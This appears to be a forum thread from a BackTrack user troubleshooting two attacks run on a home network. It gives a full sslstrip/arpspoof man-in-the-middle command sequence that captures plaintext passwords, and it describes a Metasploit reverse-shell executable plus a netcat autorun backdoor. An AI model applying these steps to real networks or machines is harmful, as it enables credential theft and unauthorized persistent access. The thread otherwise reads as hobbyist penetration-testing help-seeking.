sslstrip & Netcat backdooring

[Stallh0f3n]

Hey guys!

I'm new to Backtrack and so I'm facing some problems:

(I apply everything at home in my own network!)

SSLSTRIP:
I use the following commands:

1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 10000
3. cd /pentest/web/sslstrip/
4. python sslstrip.py -p -l 10000 -w /root/Desktop/capture.txt
5. arpspoof -i eth0 -t <target ip> <gateway ip>

Backtrack is running on my mac with VMware!

If I sniff the https sites of the mac, everything works nicely and I get the usernames and the passwords in plain text. But if I sniff my real Win XP(SP3) PC, sslstrip captures nonsence in the /root/Desktop/capture.txt file - I think it captures ssl secured data!
That's strange because if I enter Facebook (on the Win XP machine) in the URL stands HTTP and not HTTPS, so it should work. On the other side, if I visit Gmail, or something else, the HTTPS is still there (I'm using sslstrip 0.9 - the Gmail-bug should be gone).

Metasploit - backdooring:

I got into the Win XP machine with a hidden exploit in an .exe file with windows/meterpreter/reverse_tcp as PAYLOAD. All works perfect - creating a session, uploading netcat(nc.exe), creating a new value in the autorun registry for backdoor(nc) - until I reboot the remote pc. I can't connect with the command "nc <victim ip> <port>" any more.


I hope you know what to do.

[zimmaro]

hi
for netcat tries to take a look in the video section of the forum (3 page at the bottom)
I did a test with BT5, and "we had opened a tread"
http://www.backtrack-linux.org/forum...ad.php?t=41488
bye

[Stallh0f3n]

hi
for netcat tries to take a look in the video section of the forum (3 page at the bottom)
I did a test with BT5, and "we had opened a tread"
http://www.backtrack-linux.org/forum...ad.php?t=41488
bye

"Page not found"